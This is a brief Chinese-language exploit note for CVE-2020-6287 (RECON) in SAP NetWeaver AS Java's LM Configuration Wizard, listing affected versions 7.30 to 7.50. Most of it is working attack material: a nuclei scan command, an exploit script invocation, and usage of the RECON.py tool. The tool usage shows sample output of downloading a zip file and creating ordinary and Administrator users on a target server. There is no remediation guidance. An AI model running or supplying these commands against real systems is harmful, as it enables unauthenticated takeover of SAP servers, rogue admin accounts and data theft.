漏洞概述

在SAP NetWeaver AS Java 的LM配置向导中缺乏身份验证，未经身份验证的远程攻击者可以执行有危害的操作，包括但不限于创建管理员用户。攻击者可能获得对adm的访问权限，adm是操作系统用户，它可以无限制地访问与SAP系统相关的所有本地资源。

影响范围

SAP NetWeaver AS JAVA（LM Configuration Wizard）7.30
SAP NetWeaver AS JAVA（LM Configuration Wizard）7.31
SAP NetWeaver AS JAVA（LM Configuration Wizard）7.40
SAP NetWeaver AS JAVA（LM Configuration Wizard）7.50

POC

nuceli -tags sap -t cves/ -l urls.txt

EXP

python CVE-2020-6287.py http://vul-IP:50000/ test123 test@123123

EXP (RECON.py)

chipik/SAP_RECON Just point SAP NW AS Java hostnmae/ip.

There is additional options:

1. -c - check if SAP server is vulnerable to RECON
2. -f - download zip file from SAP server
3. -u - create user SAP JAVA user with Authenticated User role
4. -a - create user SAP JAVA user with Administrator role

Ex.: Download zip file

python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved

Ex.: Create SAP JAVA user

~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created

Ex.: Create SAP JAVA Administrator user

~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created